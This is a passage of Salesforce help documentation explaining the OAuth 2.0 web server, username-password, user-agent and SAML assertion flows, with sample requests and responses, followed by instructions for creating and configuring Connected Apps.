• scope—The scope parameter enables you to fine-tune what the client application can access in a Salesforce organization.

See Scope Parameter Values on page 3675 for valid parameters.
• redirect_uri—URI to redirect the user to after approval. This must match the value in the Callback URL field in

the remote access application definition exactly, or approval fails. This value must be URL encoded.
• state—Any state the consumer wants reflected back to it after approval, during the callback. This parameter is optional.

This value must be URL encoded.
• immediate—Determines whether the user should be prompted for login and approval. This parameter is optional. The

value must be true or false if specified. Default value is false. Note the following:

◊ If set to true, and if the user is currently logged in and has previously approved the client_id, Salesforce skips the
approval step.

◊ If set to true and the user is not logged in or has not previously approved the client, Salesforce immediately terminates
with the immediate_unsuccessful error code.

Note:  This option is not available for Communities.

• display—Changes the login and authorization pages’ display type. This parameter is optional. The only values Salesforce
supports are:

◊ page—Full-page authorization screen. This is the default value if none is specified.
◊ popup—Compact dialog optimized for modern web browser popup windows.
◊ touch—mobile-optimized dialog designed for modern smartphones such as Android and iPhone.
◊ mobile—mobile optimized dialog designed for less capable smartphones such as BlackBerry OS 5.

• prompt—Specifies how the authorization server prompts the user for reauthentication and reapproval. This parameter is
optional. The only values Salesforce supports are:

◊ login—The authorization server must prompt the user for reauthentication, forcing the user to log in again.
◊ consent—The authorization server must prompt the user for reapproval before returning information to the client.

It is valid to pass both values, separated by a space, to require the user to both log in and reauthorize. For example:

?prompt=login%20consent
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In order to initiate the flow, the Web server generally forms a link, or sends an HTTP redirect to the browser. The following
is an example of a request to an authorization endpoint from a Web server client:

https://login.salesforce.com/services/oauth2/authorize?response_type=code&client_id=
3MVG9lKcPoNINVBIPJjdw1J9LLM82HnFVVX19KY1uA5mu0QqEWhqKpoW3svG3XHrXDiCQjK1mdgAvhCscA
9GE&redirect_uri=https%3A%2F%2Fwww.mysite.com%2Fcode_callback.jsp&state=mystate

If the user is logged in, Salesforce redirects them to the approval page. If the user is not logged in, they are asked to log in,
then redirected to the approval page where they grant access to the application. If the user has already approved access once,
they don’t have to approve access again.

Web Server Received Callback

Once the user approves the access, they are redirected to the URI specified in redirect_uri with the following values in
the query string:

• code—Authorization code the consumer must use to obtain the access and refresh tokens
• state—State that was passed into the approval step. This isn’t included if the state parameter wasn’t included in the

original query string.

If the user has already approved the access once, they do not have to approve access again.

The following is an example of the request received by the redirect_uri:

https://www.mysite.com/code_callback.jsp?code=aPrxsmIEeqM9&state=mystate

If the user denies the application, they are redirected to the redirect_uri with the following values in the query string:

• error—Value is access_denied.
• state—State that was passed into the approval step. This isn’t included if the state parameter wasn’t included in the

original query string.

For example:

https://www.mysite.com/code_callback.jsp?error=access-denied&state=mystate

If an error occurs during this step, the response contains an error message containing these parts:

• error—Error code
• error_description—Description of the error with additional information.

◊ unsupported_response_type—response type not supported
◊ invalid_client_id—client identifier invalid
◊ invalid_request—HTTPS required
◊ invalid_request—must use HTTP GET
◊ access_denied—end-user denied authorization
◊ redirect_uri_missing—redirect_uri not provided
◊ redirect_uri_mismatch—redirect_uri mismatch with remote access application definition
◊ immediate_unsuccessful—immediate unsuccessful
◊ invalid_scope—requested scope is invalid, unknown, or malformed

• state—State that was passed into the approval step. This isn’t included if the state parameter wasn’t included in the
original query string.
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Web Server Exchanges Verification Code for Access Token

After obtaining the authorization code, the Web server exchanges the authorization code for an access token.

The consumer should make a POST directly to the token endpoint, with the following parameters:

• grant_type—Value must be authorization_code for this flow.
• client_id—Consumer key from the remote access application definition.
• client_secret—Consumer secret from the remote access application definition.
• redirect_uri—URI to redirect the user to after approval. This must match the value in the Callback URL field in

the remote access application definition exactly, and is the same value sent by the initial redirect. See Redirect User to
Obtain Access Authorization on page 3700.

• code—Authorization code obtained from the callback after approval.
• format—Expected return format. This parameter is optional. The default is json. Values are:

◊ urlencoded

◊ json

◊ xml

The following is an example of the POST body sent out-of-band:

POST /services/oauth2/token HTTP/1.1
Host: login.salesforce.com
grant_type=authorization_code&code=aPrxsmIEeqM9PiQroGEWx1UiMQd95_5JUZ
VEhsOFhS8EVvbfYBBJli2W5fn3zbo.8hojaNW_1g%3D%3D&client_id=3MVG9lKcPoNI
NVBIPJjdw1J9LLM82HnFVVX19KY1uA5mu0QqEWhqKpoW3svG3XHrXDiCQjK1mdgAvhCs
cA9GE&client_secret=1955279925675241571&
redirect_uri=https%3A%2F%2Fwww.mysite.com%2Fcode_callback.jsp

Instead of using the format parameter, the client can also specify the returned format in an accept-request header using one
of the following:

• Accept: application/json

• Accept: application/xml

• Accept: application/x-www-form-urlencoded

Note the following:

• Wildcard accept headers are allowed. */* is accepted and returns JSON.
• A list of values is also accepted and is checked left-to-right. For example:

application/xml,application/json,application/html,*/* returns XML.
• The format parameter takes precedence over the accept request header.

Salesforce Responds with an Access Token Response

After the request is verified, Salesforce sends a response to the client. The following parameters are in the body of the response:

• access_token—Salesforce session ID that can be used with the Web services API.
• refresh_token—Token that can be used in the future to obtain new access tokens (sessions). This value is a secret.

You should treat it like the user’s password and use appropriate measures to protect it.
• instance_url—URL indicating the instance of the user’s organization. In this example, the instance is na1:

https://na1.salesforce.com.
• id—Identity URL that can be used to both identify the user as well as query for more information about the user. See

Using Identity URLs on page 3678.
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• signature—Base64-encoded HMAC-SHA256 signature signed with the consumer’s private key containing the
concatenated ID and issued_at. This can be used to verify the identity URL was not modified since it was sent by the
server.

• issued_at—When the signature was created.

The following is an example response from Salesforce:

{"id":"https://login.salesforce.com/id/00Dx0000000BV7z/005x00000012Q9P",
"issued_at":"1278448101416","refresh_token":"5Aep8614iLM.Dq661ePDmPEgaAW9
Oh_L3JKkDpB4xReb54_pZebnUG0h6Sb4KUVDpNtWEofWM39yg==","instance_url":
"https://na1.salesforce.com","signature":"CMJ4l+CCaPQiKjoOEwEig9H4wqhpuLSk
4J2urAe+fVg=","access_token":"00Dx0000000BV7z!AR8AQP0jITN80ESEsj5EbaZTFG0R
NBaT1cyWk7TrqoDjoNIWQ2ME_sTZzBjfmOE6zMHq6y8PIW4eWze9JksNEkWUl.Cju7m4"}

If an error occurs during this step, the response contains an error message with these parts:

• error—Error code
• error_description—Description of the error with additional information.

◊ unsupported_response_type—response type not supported
◊ invalid_client_id—client identifier invalid
◊ invalid_request—HTTPS required
◊ invalid_request—must use HTTP POST
◊ invalid_client_credentials—client secret invalid
◊ invalid_grant—invalid authorization code
◊ invalid_grant—IP restricted or invalid login hours
◊ redirect_uri_mismatch—redirect_uri not provided
◊ redirect_uri_mismatch—redirect_uri mismatch with remote access application definition
◊ inactive_user—user has been set to inactive by the administrator
◊ inactive_org—organization is locked, closed, or suspended
◊ rate_limit_exceeded—number of login attempts has been exceeded

Any login error not listed receives a generic authentication failure with text describing the error. For example,
LOGIN_ERROR_INVALID_PASSWORD would have the following error response:

{"error":"authentication_failure","error_description":"invalid password"}

See Also:
Authenticating Remote Access Application OAuth
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OAuth 2.0 Username-Password Flow
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

The username-password authentication flow can be used to authenticate when the consumer already has the user’s credentials.

Warning:  This OAuth authentication flow involves passing the user’s credentials back and forth. Use this
authentication flow only when necessary. No refresh token will be issued.

The following are the steps for the username-password authentication flow. More detail about each step follows:

1. The consumer uses the end-user’s username and password to request an access token (session ID.)
2. After the request is verified, Salesforce sends a response to the client.

After a consumer has an access token, they can use the access token to access Salesforce data on the end-user’s behalf.

Request an Access Token

The consumer can use the end-user’s username and password to request an access token, which can be used as a session ID.

The consumer should make an out-of-band POST request to the token endpoint, with the following parameters:

• grant_type—Value must be password for this flow.
• client_id—Consumer key from the remote access application definition.
• client_secret—Consumer secret from the remote access application definition.
• username—End-user username.
• password—End-user password

Note:  When using the username-password flow with the API, be sure to create a field in the username and
password login screen where users can input their security token. The security token is an automatically generated
key that must be added to the end of the password in order to log in to Salesforce from an untrusted network.
You must concatenate their password and token when passing the request for authentication.

• format—Expected return format. This parameter is optional. The default is json. Values are:

◊ urlencoded

◊ json

◊ xml

The following is an example of the body of the out-of-band POST:

grant_type=basic-credentials&client_id=3MVG9lKcPoNINVBIPJjdw1J9LLM82Hn
FVVX19KY1uA5mu0QqEWhqKpoW3svG3XHrXDiCQjK1mdgAvhCscA9GE&client_secret=
1955279925675241571&username=testuser%40salesforce.com&password=mypassword
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Send Response

After the request is verified, Salesforce sends a response to the client. The following parameters are in the body of the response:

• access_token—Salesforce session ID that can be used with the Web services API.
• instance_url—URL indicating the instance of the user’s organization. In this example, the instance is na1:

https://na1.salesforce.com.
• id—Identity URL that can be used to both identify the user as well as query for more information about the user. See

Using Identity URLs on page 3678.
• signature—Base64-encoded HMAC-SHA256 signature signed with the consumer’s private key containing the

concatenated ID and issued_at. This can be used to verify the identity URL was not modified since it was sent by the
server.

• issued_at—When the signature was created.

Note:  No refresh token is sent with this response.

The following is an example response:

{"id":"https://login.salesforce.com/id/00Dx0000000BV7z/005x00000012Q9P",
"issued_at":"1278448832702","instance_url":"https://na1.salesforce.com",
"signature":"0CmxinZir53Yex7nE0TD+zMpvIWYGb/bdJh6XfOH6EQ=","access_token":
"00Dx0000000BV7z!AR8AQAxo9UfVkh8AlV0Gomt9Czx9LjHnSSpwBMmbRcgKFmxOtvxjTrKW1
9ye6PE3Ds1eQz3z8jr3W7_VbWmEu4Q8TVGSTHxs"}

If a problem occurs during this step, the response contains an error message with these parts:

• error—Error code
• error_description—Description of the error with additional information.

◊ unsupported_response_type—response type not supported
◊ invalid_client_id—client identifier invalid
◊ invalid_request—HTTPS required
◊ invalid_request—must use HTTP POST
◊ invalid_client_credentials—client secret invalid
◊ invalid_grant—invalid user credentials
◊ invalid_grant—IP restricted or invalid login hours
◊ inactive_user—user is inactive
◊ inactive_org—organization is locked, closed, or suspended
◊ rate_limit_exceeded—number of logins exceeded
◊ invalid_scope—requested scope is invalid, unknown, or malformed

Any login error not listed receives a generic authentication failure with text describing the error. For example,
LOGIN_ERROR_INVALID_PASSWORD would have the following error response:

{"error":"authentication_failure","error_description":"invalid password"}
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The following is an example of a returned error:

{"error":"invalid_client_credentials","error_description":"client secret invalid"}

See Also:
Authenticating Remote Access Application OAuth

OAuth 2.0 User-Agent Flow
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

The user-agent authentication flow is used by client applications (consumers) residing in the user's device. This could be
implemented in a browser using a scripting language such as JavaScript, or from a mobile device or a desktop application.
These consumers cannot keep the client secret confidential. The authentication of the consumer is based on the user-agent's
same-origin policy.

Unlike the other authentication flows, the client application receives the access token in the form of an HTTP redirection.
The client application requests the authorization server to redirect the user-agent to another web server or local resource
accessible to the user-agent, which is capable of extracting the access token from the response and passing it to the client
application. Note that the token response is provided as a hash (#) fragment on the URL. This is for security, and prevents
the token from being passed to the server, as well as to other servers in referral headers.

This user-agent authentication flow doesn't utilize the client secret since the client executables reside on the end-user's computer
or device, which makes the client secret accessible and exploitable.

Warning:  Because the access token is encoded into the redirection URI, it might be exposed to the end-user and
other applications residing on the computer or device.

If you are authenticating using JavaScript, call window.location.replace(); to remove the callback from the
browser’s history.

The following diagram displays the authentication flow steps for Web server clients. The individual step descriptions follow.
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1. The client application directs the user to Salesforce to authenticate and authorize the application.
2. The user must always approve access for this authentication flow. After approving access, the application receives the

callback from Salesforce.

After a consumer has an access token, they can use the access token to access Salesforce data on the end user's behalf and a
refresh token to get a new access token if it becomes invalid for any reason.

The user-agent flow does not support out-of-band posts.

Direct User to Salesforce to Obtain Access Token

To obtain authorization from the user to access Salesforce data on his or her behalf, the client directs the user to the authorization
endpoint with the following parameters:

• response_type—Value must be token for this flow.
• client_id—Consumer key from the remote access application definition.
• redirect_uri—URI to redirect the user to after approval. This must match the value in the Callback URL field in

the remote access application definition exactly. This value must be URL encoded.
• state—Any state the consumer wants reflected back to it after approval, during the callback. This parameter is optional.
• scope—The scope parameter enables you to fine-tune what the client application can access in a Salesforce organization.

See Scope Parameter Values on page 3675 for valid parameters.
• display—Changes the login page's display type. This parameter is optional. The only values Salesforce supports are:

◊ page—Full-page authorization screen. This is the default value if none is specified.
◊ popup—Compact dialog optimized for modern web browser popup windows.
◊ touch—mobile-optimized dialog designed for modern smartphones, such as Android and iPhone.

• prompt—Specifies how the authorization server prompts the user for reauthentication and reapproval. This parameter is
optional. The only values Salesforce supports are:

◊ login—The authorization server must prompt the user for reauthentication, forcing the user to log in again.
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◊ consent—The authorization server must prompt the user for reapproval before returning information to the client.

It is valid to pass both values, separated by a space, to require the user to both log in and reauthorize. For example:

?prompt=login%20consent

The following is an example URL where the user is directed to:

https://login.salesforce.com/services/oauth2/authorize?response_type=token&
client_id=3MVG9lKcPoNINVBIPJjdw1J9LLJbP_pqwoJYyuisjQhr_LLurNDv7AgQvDTZwCoZuD
ZrXcPCmBv4o.8ds.5iE&redirect_uri=https%3A%2F%2Fwww.mysite.com%2Fuser_callback.jsp&
state=mystate

User Approves Access and Client Receives Callback from Salesforce

The user is asked to log in to Salesforce if they are not already logged in. Then Salesforce displays an approval page, asking
the user to approve the application access. If the user approves the access, they are redirected to the URI specified in
redirect_uri with the following values after the hash sign (#). This is not a query string.

• access_token—Salesforce session ID that can be used with the Web services API.
• refresh_token—Token that can be used in the future to obtain new access tokens (sessions). This value is a secret.

You should treat it like the user’s password and use appropriate measures to protect it.

Note:  The refresh token for the user-agent flow is only issued under one of the following circumstances:

◊ The redirect URL uses a custom protocol.
◊ The redirect URL is exactly https://login.salesforce.com/services/oauth2/success, or on

Sandbox, https://test.salesforce.com/services/oauth2/success.

• instance_url—URL indicating the instance of the user’s organization. In this example, the instance is na1:
https://na1.salesforce.com.

• id—Identity URL that can be used to both identify the user as well as query for more information about the user. See
Using Identity URLs on page 3678.

• signature—Base64-encoded HMAC-SHA256 signature signed with the consumer’s private key containing the
concatenated ID and issued_at. This can be used to verify the identity URL was not modified since it was sent by the
server.

• issued_at—When the signature was created.

The following is an example of the callback from the server. Note the response is behind a hash, rather than as HTTP query
parameters:

https://www.mysite.com/user_callback.jsp#access_token=00Dx0000000BV7z%21AR8
AQBM8J_xr9kLqmZIRyQxZgLcM4HVi41aGtW0qW3JCzf5xdTGGGSoVim8FfJkZEqxbjaFbberKGk
8v8AnYrvChG4qJbQo8&refresh_token=5Aep8614iLM.Dq661ePDmPEgaAW9Oh_L3JKkDpB4xR
eb54_pZfVti1dPEk8aimw4Hr9ne7VXXVSIQ%3D%3D&expires_in=7200&state=mystate

If the user denies access or an error occurs during this step, they are redirected to the redirect_uri with an error code and
the description of the error in the URI, after the hash tag (#). This is not a query string.

• error—Error code
• error_description—Description of the error with additional information.

◊ unsupported_response_type—response type not supported
◊ invalid_client_id—client identifier invalid
◊ invalid_request—HTTPS required
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◊ invalid_request—must use HTTP GET
◊ invalid_request—out-of-band not supported
◊ access_denied—end-user denied authorization
◊ redirect_uri_missing—redirect_uri not provided
◊ redirect_uri_mismatch—redirect_uri mismatch with remote access object
◊ immediate_unsuccessful—immediate unsuccessful
◊ invalid_grant—invalid user credentials
◊ invalid_grant—IP restricted or invalid login hours
◊ inactive_user—user is inactive
◊ inactive_org—organization is locked, closed, or suspended
◊ rate_limit_exceeded—number of logins exceeded
◊ invalid_scope—requested scope is invalid, unknown, or malformed

Any login error not listed receives a generic authentication failure with text describing the error. For example,
LOGIN_ERROR_INVALID_PASSWORD would have the following error response:

{"error":"authentication_failure","error_description":"invalid password"}

• state—State that was passed into the approval step. This isn’t included if the state parameter wasn’t included in the
original query string.

The following is an example error redirect URI:

https://www.mysite.com/user_callback.jsp#error=access_denied&state=mystate

See Also:
Authenticating Remote Access Application OAuth

SAML Assertion Flow
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

The SAML assertion flow is an alternative for organizations that are currently using SAML to access Salesforce, and want to
access the Web services API the same way. The SAML assertion flow can only be used inside a single organization. You do
not have to create a remote access application to use this assertion flow. Clients can use this to federate with the API using a
SAML assertion, in much the same way as they would federate with Salesforce for Web single sign-on. See About Single
Sign-On on page 587.

The following are the general steps for using this flow. Many of the steps are described in more detail below.

1. Configure SAML on page 3710 for your organization. You must use SAML version 2.0.
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2. Exchange a SAML assertion for an access token.
3. Salesforce sends the response.
4. Use a JSON parser to process the response and extract the access_token.

Configuring SAML for OAuth

To configure your organization to use SAML, follow the instructions in the Configuring SAML Settings for Single Sign-On
topic. Once you have configured SAML, you can use the exact same configuration for both Web and API federation.

Note: SAML Identity Type cannot be Assertion contains the User ID from the User object.

Two URLs are provided after you configure SAML for your organization:

• Salesforce.com Login URL—Use this URL when doing Web single sign-on.
• OAuth 2.0 Token Endpoint—Use this URL when exchanging a SAML assertion for an access token to be used with

the API.

When generating SAML assertions to be used with the token endpoint, the recipient URL in the assertion may be the value
from either the OAuth 2.0 Token Endpoint or the Salesforce.com Login URL.

Exchange a SAML Assertion for an Access Token

In order to exchange a SAML assertion for an access token, your client must obtain or generate a valid SAML response and
POST this to the token endpoint. The method of obtaining this response is up to the client to determine. Once the client has
a valid response, it sends the following parameters:

• grant_type—Value must be assertion for this flow.
• assertion—A Base-64 encoded SAML response that would normally be used for Web single sign-on
• assertion_type—Must be urn:oasis:names:tc:SAML:2.0:profiles:SSO:browser
• format—Expected return format. This parameter is optional. The default is json. Values are:

◊ urlencoded

◊ json

◊ xml

The following is the body of an example of an out-of-band POST made to the
https://login.salesforce.com/services/oauth2/token:

grant_type=assertion&assertion_type=
urn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3Aprofiles%3ASSO%3Abrowser&
assertion=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPHNhbW. . .

Salesforce Server Sends a Response

After the SAML response is verified, Salesforce sends a response to the client. The following parameters are in the body of
the response:

• access_token—Salesforce session ID that can be used with the Web services API.
• id—Identity URL that can be used to both identify the user as well as query for more information about the user. See

Using Identity URLs on page 3678.
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The following is an example response from Salesforce:

{"id":"https://login.salesforce.com/id/00Dx0000000BV7z/005x00000012Q9P",
"instance_url":"https://na1.salesforce.com","access_token":
"00Dx0000000BV7z!AR8AQNhMmQeDIKR0.hZagSTaEPCkmoXeYnkaxQnqWlG6Sk9U3i3IFjEH
IzDlsYdU0qoVCXNJtPOwdb7u5rKfq9NldfAKoQjd"}

If an error occurs during this step, the response contains an error message with these parts:

• error—Error code
• error_description—Description of the error with additional information.

◊ unsupported_response_type—response type not supported
◊ invalid_request—HTTPS required
◊ invalid_request—must use HTTP POST
◊ invalid_assertion_type—specified assertion type is not supported
◊ invalid_grant—invalid authorization code
◊ invalid_grant—IP restricted or invalid login hours
◊ inactive_user—user is inactive
◊ inactive_org—organization is locked, closed, or suspended
◊ rate_limit_exceeded—number of logins exceeded

Any login error not listed receives a generic authentication failure with text describing the error. For example,
LOGIN_ERROR_INVALID_PASSWORD would have the following error response:

{"error":"authentication_failure","error_description":"invalid password"}

• error_uri—A link to the SAML Assertion Validator, which contains more information about the failure. This is only
returned when Salesforce is able to parse the assertion.

The following is an example error:

{"error_uri":"https://na1.salesforce.com/setup/secur/SAMLValidationPage.apexp",
"error":"invalid_grant","error_description":"invalid assertion"}

See Also:
Authenticating Remote Access Application OAuth
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GRANT OR DENY ACCESS REQUEST

Remote Access Application Request
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

The external application you are using is requesting access to your Salesforce data. The external application has already been
integrated into Salesforce by your administrator.

To grant this application access to your Salesforce data, click Accept.

If the description of the application does not match the application you are currently using or for any other reason you do not
want to grant access to your data, click Deny.

If the currently logged in user is not you, click Not you? to log out the current user and log in as yourself.

You can only grant access to an external application a specific number of times. Generally, you grant access for every device
you use, such as a laptop and a desktop computer. The default is five per application. If you’ve reached the limit for your
organization, granting access to this application automatically revokes access to the token or tokens for this application that
haven’t been used for the longest period of time. The remote access application token or tokens that will be revoked display
on the page.

After you have granted access to a remote access application, you can revoke it later by going to your personal information,
then in the Remote Access related section, clicking Revoke.

See Also:
Remote Access Application Request Approved
Remote Access Application Request Denied
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Remote Access Application Request Approved
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

The external application you are using has requested access to your Salesforce data, and you approved this request. Close the
browser window and go back to the application you were using.

After you have granted access to a remote access application, you can revoke it later by going to your personal information,
then in the Remote Access related section, clicking Revoke.

See Also:
Remote Access Application Request Denied
Remote Access Application Request

Remote Access Application Request Denied
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

The external application you are using has requested access to your Salesforce data and you denied this access. You should log
out of Salesforce. You can go back to the originating application.

See Also:
Remote Access Application Request Approved
Remote Access Application Request
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Remote Access Applications and OAuth Terminology
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

Access Token

A value used by the consumer to gain access to protected resources on behalf of the user, instead of using the user’s
Salesforce credentials.

For OAuth 1.0.A, the access token must be exchanged for a session ID.

For OAuth 2.0, the access token is a session ID, and can be used directly.

Authorization Code

Only used in OAuth 2.0 with the Web server flow. A short-lived token that represents the access granted by the end
user. The authorization code is used to obtain an access token and a refresh token. For OAuth 1.0.A, see RequestToken.

Callback URL

A URL associated with your client application. In some contexts this must be a real URL that the client’s Web browser
is redirected to. In others, the URL isn’t actually used; however, between your client application and the server (the
remote access application definition) the value must be same. For example, you may want to use a value that identifies
the application, such as http://MyCompany.Myapp.

Consumer

A Web site or application that uses OAuth to authenticate both the Salesforce user as well as the application on the
user’s behalf.

Consumer Key

A value used by the consumer to identify itself to Salesforce. Referred to as client_id in OAuth 2.0.

Consumer Secret

A secret used by the consumer to establish ownership of the consumer key. Referred to as client_secret in OAuth
2.0.

Nonce

A number, often a random number, used during authentication to ensure that requests cannot be reused.

Refresh Token

Only used in OAuth 2.0. A token used by the consumer to obtain a new access token, without having the end user
approve the access again.

Request Token

A value used by the consumer to obtain authorization from the user, and exchanged for an access token. Request tokens
are only used in OAuth 1.0.A. For OAuth 2.0, see Authorization Code.
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Service Provider

A Web application that allows access using OAuth. This is your Salesforce instance after remote access has been enabled.

Token Secret

A secret used by the consumer to establish ownership of a given token, both for request tokens and access tokens.

User

An individual who has a Salesforce login.

See Also:
Authenticating Remote Access Application OAuth

CONNECTED APPS

Connected Apps Overview

Connected Apps can be created in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Connected Apps can be installed in: All Editions

User Permissions Needed

“Customize Application”To manage apps:

“View Setup and Configuration”To view apps:

A Connected App is an application that integrates with salesforce.com using APIs. Connected Apps use standard SAML and
OAuth protocols to authenticate, provide Single Sign-On, and provide tokens for use with Salesforce APIs. In addition to
standard OAuth capabilities, Connected Apps allow administrators to set various security policies and have explicit control
over who may use the applications.

Connected Apps begin with a developer defining OAuth metadata about the application, including:

• Basic descriptive and contact information for the Connected App

• The OAuth scopes and callback URL for the Connected App

• Optional IP ranges where the Connected App might be running

• Optional information about mobile policies the Connected App can enforce

In return, the developer is provided an OAuth client Id and client secret for the Connected App. The developer can then
package the app and provide it to a Salesforce administrator.

There are two deployment modes:

• The app is created and used in the same organization. This is a typical use case for IT departments, for example.
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• The app is created in one organization and installed on other organizations. This is how an entity with multiple organizations
or an ISV would use Connected Apps.

The administrator can install the Connected App into their organization and use profiles, permission sets, and IP range
restrictions to control which users can access the application. Management is done from a detail page for the Connected App.
The administrator can also uninstall the Connected App and install a newer version. When the app is updated, the developer
can notify administrators that there is a new version available for the app.

See Also:
Creating a Connected App
Editing, Packaging, or Deleting a Connected App

Creating a Connected App
Follow these steps to create a Connected App:

1. From Setup, click Create > Apps.
2. In the Connected Apps section, click New.

The information required to create a connected app is divided into these parts:

• Basic Information describes your application, its appearance in the list of available applications, and how someone can
contact you about the application.

• OAuth Settings specifies how your application communicates with Salesforce.

• SAML Service Provider Settings are used when your connected app uses single sign-on.

• Mobile Integration specifies PIN length and session timeout values available for mobile applications.

• IP ranges work with OAuth, not SAML, and allow a developer to register the IP ranges their application uses to make
requests from Salesforce. You set these after creating the app.

• Supported App Types contains information that’s specific to particular types of applications. If your organization allows
connected apps of certain types, this section appears. The settings available vary depending upon the application type.

When you’ve finished entering the information, click Save to save your new app. You can now publish your app, make further
edits, or delete it. If you’re using OAuth, saving your app gives you two new values the app uses to communicate with Salesforce:

• Consumer Key—A value used by the consumer to identify itself to Salesforce. Referred to as client_id in OAuth 2.0.

• Consumer Secret—A secret used by the consumer to establish ownership of the consumer key. Referred to as
client_secret in OAuth 2.0.

Connected App Basic Information

Specify basic information about your app in this section, including the app name, logo, and contact information.

1. In Connected App Name, enter the name for your application. This name displays in the list of Connected Apps.

Note:  The name must be completely unique in your organization. You can’t reuse an existing name or the name
of a deleted connected app.

2. The API Name is used when referring to the connected app from a program. It defaults to a version of the name without
spaces. Only letters, numbers, and underscores are allowed, so you’ll need to edit the default name if the original app name
contained any other characters.
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3. In Description, enter an optional description for your application. This also displays in the list of Connected Apps.
4. Optionally enter the Logo Image URL for your application logo. The logo appears with the application’s entry in the list

of apps and on the consent page the user sees when authenticating. The URL must use HTTPS, and the logo can’t be
larger than 125 pixels high or 200 pixels wide. The default logo is a cloud.

5. The Icon URL appears on the OAuth approval page that the user sees when they first use the connected app. The logo
should be 16 pixels high and wide, on a white background.

6. You can optionally enter an Info URL if you have a Web page for more information about your application.
7. Use the Start URL to direct your users to a specific location after they’ve authenticated. If you don’t give a Start URL

value, the user is sent to the application’s default start page after authentication completes. If the connected app that you’re
creating is a canvas app, then you don’t need to enter a value for this field. The Canvas App URL field contains the URL
that gets called for the connected app.

8. Mobile Start URL is similar to Start URL, but is used instead when the app is accessed from a mobile device.  If the
connected app that you’re creating is a canvas app, then you don’t need to enter a value for this field. The Canvas App
URL field contains the URL that gets called for the connected app.

9. Enter a phone number in Contact Phone for salesforce.com to use in case we need to contact you. This number is not
provided to administrators installing the application.

10. In Contact Email, enter the email address salesforce.com should use for contacting you or your support team. This address
is not provided to administrators installing the application.

Connected App OAuth Settings

This section controls how your app communicates with Salesforce. Select Enable OAuth Settings to configure
authentication settings.

1. Enter a Callback URL. This is the URL (endpoint) that Salesforce calls back to your application during OAuth; it’s the
OAuth redirect_uri.

2. If you’re using the JWT OAuth flow, check Use Digital Signatures if the app uses a certificate, and then type or browse
to the certificate file name.

3. Pick the Selected OAuth Scopes for your application from the list of available OAuth scopes. The scopes refer to permissions
given by the user running the connected app, and are followed by their OAuth token name in parentheses:

DescriptionValue

Allows access to the current, logged-in user’s account over the APIs, such as the REST
API or Bulk API. This also includes the chatter_api, allowing access to Chatter API
resources.

api

Allows access to only the Chatter API resources.chatter_api

Allows access to all data accessible by the logged-in user. full does not return a refresh
token. You must explicitly request the refresh_token scope to get a refresh token.

full

Allows access only to the identity URL service.id

Allows a refresh token to be returned if you are eligible to receive one.refresh_token

Allows access to Visualforce pages.visualforce

Allows the ability to use the access_token on the Web. This also includes
visualforce, allowing access to Visualforce pages.

web

If your organization had the No user approval required for users in this organization option selected on
your remote access prior to the Spring ’12 release, users in the same organization as the one the app was created in still have
automatic approval for the app. The read-only No user approval required for users in this organization
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checkbox is selected to show this condition. For Connected Apps, the recommended procedure after you’ve created an app is
for administrators to install the app and then set Permitted Users to Admin-approved users. If the remote access
option was not checked originally, the checkbox doesn’t display.

Connected App SAML Service Provider Settings

If your connected app will use a SAML service provider, select SAML Service Provider Settings. Get the Entity Id, Assertion
Consumer Service (ACS) URL, and the subject type from your service provider. Select Service Provider Certificate
if the service provider gave you a security certificate. Browse your system for the certificate. This is only necessary if you plan
to initiate logging into Salesforce from the service provider and the service provider signs their SAML requests.

Important:  If you upload a certificate, all SAML requests must be signed. If no certificate is uploaded, all SAML
requests are accepted.

Connected App Mobile Integration

If your app is a mobile application, you might wish to enforce policies for screen locking and PIN protection. These policies
are automatically enforced by the Salesforce Classic SDK (http://developer.force.com/mobilesdk) or you can
implement this manually by reading the mobile_policies object from the user’s Identity URL. If you enforce this, select
Implements Screen Locking & Pin Protection to give an administrator the option of setting the session timeout and PIN
length for mobile applications after installing the connected app.

If you remove mobile integration from a new version of an existing connected app, mobile integration is no longer included
in any version of the connected app. For example, imagine publishing a package containing version 1.0 of your connected app
with mobile integration. Then remove mobile integration from the app, repackage it, and publish it as version 1.1. If a customer
installs the earlier package with version 1.0 at this point, the version 1.0 connected app will not contain mobile integration.

Connected App Supported App Types

Force.com Canvas

1. If your connected app will be exposed as a canvas app, select Force.com Canvas.
2. In the Canvas App URL field, type the URL of the third-party app. The user is directed to this URL when they click the

link to your canvas app.
3. Select an Access Method. This specifies how the canvas app initiates the OAuth authentication flow.

• Signed Request (POST)—OAuth authentication is used, but when the administrator installs the canvas app, they
implicitly allow access for users. Therefore, the user won’t be prompted to allow the third-party to access their user
information. When you use this access method, the authentication is posted directly to the canvas app URL.

If your canvas app uses signed request authentication, then be sure you don’t select Perform requests on your
behalf at any time in the Selected OAuth Scopes field. Signed request authorization never returns a refresh
token, even if this field value is selected.

• OAuth Webflow (GET)—OAuth authentication is used, and the user is prompted to allow the third-party application
to access their information. When you use this access method, the canvas app must initiate the OAuth authentication
flow.

4. In the Locations field, select where the canvas app can appear to the user.

• Chatter Tab—The canvas app appears in the app navigation list on the Chatter tab. If this option is selected, the
canvas app appears there automatically.
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• Visualforce Page—The canvas app can appear on a Visualforce page. If you add an <apex:canvasApp> component
to expose a canvas app on a Visualforce page, then be sure to select this location for the canvas app; otherwise, you’ll
receive an error.

See Also:
Editing, Packaging, or Deleting a Connected App
Connected Apps Overview

Editing, Packaging, or Deleting a Connected App
After creating a Connected App, you can perform the following tasks:

• Edit lets you make changes to the app information you specify when creating the app.

• Delete removes the app completely, though the name is remembered and cannot be reused.

Editing a Connected App

You can update a Connected App at any time. From Setup, click Create > Apps for the list of Connected Apps, and clicking
a Connected App Name in the list opens the detail page for the app. Click Edit to bring up the edit page where you can make
changes. Save your changes by clicking Save.

